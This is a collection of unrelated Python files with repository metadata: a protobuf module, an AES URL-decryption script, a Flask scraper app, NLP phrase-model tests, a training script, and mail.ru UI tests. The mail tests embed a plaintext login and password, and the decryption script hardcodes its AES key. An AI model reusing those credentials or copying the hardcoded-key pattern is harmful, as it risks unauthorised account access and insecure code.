ca21bf850beefb3934635ee99e0c24163174986b | 721406d87f5086cfa0ab8335a936ece839ab2451 | /.venv/lib/python3.8/site-packages/google/type/fraction_pb2.py | 23c8a91166b2febb0275a80633674e20bc07d681 | ["MIT"] | permissive | MarkusMeyer13/graph-teams-presence | 661296b763fe9e204fe1e057e8bd6ff215ab3936 | c302b79248f31623a1b209e098afc4f85d96228d | refs/heads/main | 2023-07-09T03:34:57.344692 | 2021-07-29T07:16:45 | 2021-07-29T07:16:45 | 389,268,821 | 0 | 0 | MIT | 2021-07-29T07:16:46 | 2021-07-25T05:23:08 | Python | UTF-8 | Python | false | false | 3,785 | py |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/type/fraction.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/type/fraction.proto",
package="google.type",
syntax="proto3",
serialized_options=b"\n\017com.google.typeB\rFractionProtoP\001Z<google.golang.org/genproto/googleapis/type/fraction;fraction\242\002\003GTP",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1agoogle/type/fraction.proto\x12\x0bgoogle.type"2\n\x08\x46raction\x12\x11\n\tnumerator\x18\x01 \x01(\x03\x12\x13\n\x0b\x64\x65nominator\x18\x02 \x01(\x03\x42\x66\n\x0f\x63om.google.typeB\rFractionProtoP\x01Z<google.golang.org/genproto/googleapis/type/fraction;fraction\xa2\x02\x03GTPb\x06proto3',
)
_FRACTION = _descriptor.Descriptor(
name="Fraction",
full_name="google.type.Fraction",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="numerator",
full_name="google.type.Fraction.numerator",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="denominator",
full_name="google.type.Fraction.denominator",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=43,
serialized_end=93,
)
DESCRIPTOR.message_types_by_name["Fraction"] = _FRACTION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Fraction = _reflection.GeneratedProtocolMessageType(
"Fraction",
(_message.Message,),
{
"DESCRIPTOR": _FRACTION,
"__module__": "google.type.fraction_pb2"
# @@protoc_insertion_point(class_scope:google.type.Fraction)
},
)
_sym_db.RegisterMessage(Fraction)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
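# Not part of the generated file: a hypothetical usage sketch of the message defined above.
#   from google.type import fraction_pb2
#   f = fraction_pb2.Fraction(numerator=1, denominator=3)
#   payload = f.SerializeToString()
#   same = fraction_pb2.Fraction.FromString(payload)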
| ["meyer_markus@gmx.de"] | meyer_markus@gmx.de |
4dbeff0828108da4e1337513163cf9ff4231ef57 | a4751186e3c99ae0a12229334e732eba268b76aa | /tmp/decryp.py | d9224dcc73b56d78141b138e2086e019bf4baabb | [] | no_license | ben-ginsberg/ben-ginsberg | 6d55305b5f071fbffd755e9e9e7b24269683af34 | c8007107ddf4109abf374335201bdbda0b494d7c | refs/heads/master | 2020-06-06T23:15:11.639873 | 2015-09-17T05:56:47 | 2015-09-17T05:56:47 | 42,637,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py |
from Crypto.Cipher import AES
from urllib import unquote
import sys
import string
# Decrypt the media ID embedded in the last path segment of the given URL
def decrypt(ciphUrl):
encryption_obj = AES.new('hewillneverguess')
ciphUrlArr = string.split(ciphUrl,'/')
ciph = unquote(ciphUrlArr[-1])
mediaId = encryption_obj.decrypt(ciph)
#print mediaId
#print len(mediaId)
mediaId = mediaId.replace(' ','')
#print mediaId
#print len(mediaId)
ciphUrlArr[-1] = mediaId
orgUrl = string.join(ciphUrlArr,'/')
print orgUrl
return orgUrl
if __name__ == "__main__":
    # expect exactly one argument: the encrypted media URL
    if len(sys.argv) != 2:
        exit(0)
decrypt(sys.argv[1])
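# Example invocation (hypothetical URL; the last path segment would be the URL-encoded
# AES ciphertext of a media ID):
#   python decryp.py "http://media.example.com/videos/<url-encoded-ciphertext>"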
| ["ben.ginsberg29@gmail.com"] | ben.ginsberg29@gmail.com |
73518650174055c9de5bee32806a47e90f61251c | c1519f09d483d37eea9f1e4be5dfd9b8ccd03d57 | /Python_for_Finance/7_10_yahoo_oahl.py | 1a73357203c97e6d41180abb9ecc35ea304ebe72 | [] | no_license | yf8848/Python_code | 97cfdd846e9be804fb7828362d900679d594f210 | de72e479c6dc25ff325d5a4641c3fcf477d321dd | refs/heads/master | 2020-03-23T21:58:01.280757 | 2019-02-28T09:00:37 | 2019-02-28T09:00:37 | 142,144,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py |
#!/usr/bin/env python
import datetime
# Note: these helpers lived in matplotlib.finance (removed in matplotlib >= 2.2), not
# matplotlib.mpl_finance; fetch_historical_yahoo returns a CSV file handle for csv2rec.
import matplotlib.finance as finance
import matplotlib.mlab as mlab
ticker = 'IBM'
d1 = datetime.date(2013, 1, 1)
d2 = datetime.date.today()
price = finance.fetch_historical_yahoo(ticker, d1, d2)
r = mlab.csv2rec(price)
price.close()
r.sort()
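# Note: matplotlib's finance helpers and the Yahoo CSV endpoint they relied on are gone on
# current stacks. A commonly used present-day alternative (assuming the yfinance package is
# installed) would be roughly:
#   import yfinance as yf
#   r = yf.download('IBM', start='2013-01-01')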
| ["1071380275@qq.com"] | 1071380275@qq.com |
93e99e88b4ba20f442cb177c7c51fdbdd79bcb3a | 57ee1e45ff781a824b93c68adaeb4b0a6a1a980a | /Mission_to_Mars_files/app.py | 4904b0eab26b9f52e62bf071c2cd89f1572951e1 | [] | no_license | rlau929/Mission-to-Mars | 7e1fcac36afe698a1ef203f6824f8da6e2907094 | bd7e53f8b23b009c69b577128a2d5c8b2325f2b7 | refs/heads/master | 2022-11-20T23:59:58.226923 | 2020-07-20T03:08:11 | 2020-07-20T03:08:11 | 279,430,270 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py |
from flask import Flask, render_template
from flask_pymongo import PyMongo
import scraping
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
mars = mongo.db.mars.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
mars = mongo.db.mars
mars_data = scraping.scrape_all()
mars.update({}, mars_data, upsert=True)
return "Scraping Successful!"
if __name__ == "__main__":
app.run()
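# Note: Collection.update() was removed in PyMongo 4; on newer drivers the roughly equivalent
# call would be mars.update_one({}, {"$set": mars_data}, upsert=True), or replace_one for a
# full document replacement.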
| ["rlau929@gmail.com"] | rlau929@gmail.com |
2dc3a76984646c94c1e0806754687b6a25b9b58b | 045bf2b36eefb081bea34362432b1959b4495654 | /tests/test_phrase_model.py | 5230048d0e9a7e882c1c1c11bccde527beed526a | [] | no_license | soaxelbrooke/text_tools | 6d7fea693e81e1b29a937bed2115ffa285cca2fc | 275c89f439611c01ddc964c70c1504f430c39ef2 | refs/heads/master | 2021-06-09T03:00:15.252765 | 2016-10-26T07:02:37 | 2016-10-26T07:02:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,196 | py |
from text_tools import train_phrase_model, apply_phrase_models
from gensim.models import Phrases
def test_phrase_model():
texts = [
"This is how we do it. You know it's friday night, and I feel all right, and party's here on the west side.",
"Homies said yo I don't",
"Cuz it's Friday, Friday, gotta get down on friday. Everyone's looking forward to the weekend, weekend."
]
model = train_phrase_model(texts)
assert model is not None
assert model.vocab[b'this'] > 0
def test_multi_phrase_model():
texts = [
"This is how we do it. You know it's friday night, and I feel all right, and party's here on the west side.",
"Homies said yo I don't",
"Cuz it's Friday, Friday, gotta get down on friday. Everyone's looking forward to the weekend, weekend."
]
models = train_phrase_model(texts, 3)
assert len(models) == 3
for model in models:
assert isinstance(model, Phrases)
assert model.vocab[b'this'] > 0
phrased = list(apply_phrase_models(models, texts))
# Make sure applying phrase models works, that it returns a stream of token lists
assert isinstance(phrased[0], list)
| ["stuart@axelbrooke.com"] | stuart@axelbrooke.com |
41c926449608057341f1109c06395da1a5e01fd4 | 5e1bfb7a3ec7c39810988e898c5cae6a8e142e55 | /tests/test_mail.py | f266e183c47efbf26079721a3e952c8bac4e56a3 | [] | no_license | Ksenia12k/marktek_test | f729e9c82e1e0c0d659f8c4fb0eecdfaa7f7a31a | 5d62b11c6576d3b1dbab4efab74f45ed28802297 | refs/heads/master | 2023-03-14T21:13:30.343916 | 2021-03-12T11:47:20 | 2021-03-12T11:47:20 | 347,046,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,523 | py |
from ..steps.create_letter_form_steps import CreateLetterFormSteps
from ..steps.letters_list_steps import LettersListSteps
from ..steps.inbox_menu_steps import InboxMenuSteps
from ..steps.captcha_steps import CaptchaSteps
from ..steps.base_steps import BaseSteps
from ..steps.main_steps import MainSteps
from ..steps.signup_steps import SignupSteps
def test_create_new_mail_user(app):
base_steps = BaseSteps(app)
main_steps = MainSteps(app)
signup_steps = SignupSteps(app)
captcha_steps = CaptchaSteps(app)
base_steps.open_page_step(app.base_url)
main_steps.open_signup_form_step()
signup_steps.fill_in_signup_form_step("TestName", "TestLastName", "Male", "testEmail", "krYojtEU31I|")
captcha_steps.check_captcha_is_visible_step()
def test_send_email(app):
base_steps = BaseSteps(app)
main_steps = MainSteps(app)
inbox_menu_steps = InboxMenuSteps(app)
create_letter_form_steps = CreateLetterFormSteps(app)
letters_list_steps = LettersListSteps(app)
base_steps.open_page_step(app.base_url)
main_steps.login_step("test_marktek", "&ryPTPenrO24")
inbox_menu_steps.click_create_new_letter_btn_step()
letter_text = create_letter_form_steps.send_letter_step("test_marktek@mail.ru", "Test")
create_letter_form_steps.check_letter_sent_popup_step()
inbox_menu_steps.open_menu_item_step("Входящие")
inbox_menu_steps.expand_letters_block_step("Письма себе")
letters_list_steps.check_new_letter_is_in_list_step(letter_text)
| ["kkuznetsova@sdvor.com"] | kkuznetsova@sdvor.com |
b46a348a205b103ffdf185f972fae6009c40452b | bce0430f28b303e82102b3ed0040b6c0a39a5d25 | /retrain.py | e017417ed8a0bc916faff58215df0efc14003130 | [] | no_license | riteshkumarumassedu/chexnet_Replication | 8a625af925e72aa9063e363e7b47ac9177c4592b | 2a55f2bab74fb88371f0cea81c50fda17cc0805f | refs/heads/master | 2020-05-20T14:14:04.454362 | 2019-11-04T20:00:18 | 2019-11-04T20:00:18 | 185,617,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py |
import yaml
import model as cnn_model
# read the model parameters from the yaml config file
with open('config.yaml') as config_file:
    config_dict = yaml.safe_load(config_file)
# name of the CNN model to be run
model = config_dict['model']
pretrained = config_dict['pretrained']
finetuning = config_dict['fine_tuning']
batch_size = config_dict['batch_size']
weight_decay = config_dict['weight_decay']
learning_rate = config_dict['learning_rate']
optimizer = config_dict['optimizer']
tune_epochs = config_dict['tune_epochs']
train_epochs = config_dict['train_epochs']
images_dir = config_dict['images_dir']
labels_dir = config_dict['labels_dir']
# print config details for logging purposes
print(config_dict)
# call the method to start training
# start training with the configured image directory, learning rate, and weight decay
cnn_model.train_model_handler(images_dir, learning_rate, weight_decay, config_dict)
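# A minimal config.yaml matching the keys read above might look like this (placeholder values):
#   model: densenet121
#   pretrained: true
#   fine_tuning: false
#   batch_size: 16
#   weight_decay: 0.0001
#   learning_rate: 0.001
#   optimizer: adam
#   tune_epochs: 5
#   train_epochs: 50
#   images_dir: ./data/images
#   labels_dir: ./data/labels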
| ["ritesh_kumar@live.com"] | ritesh_kumar@live.com |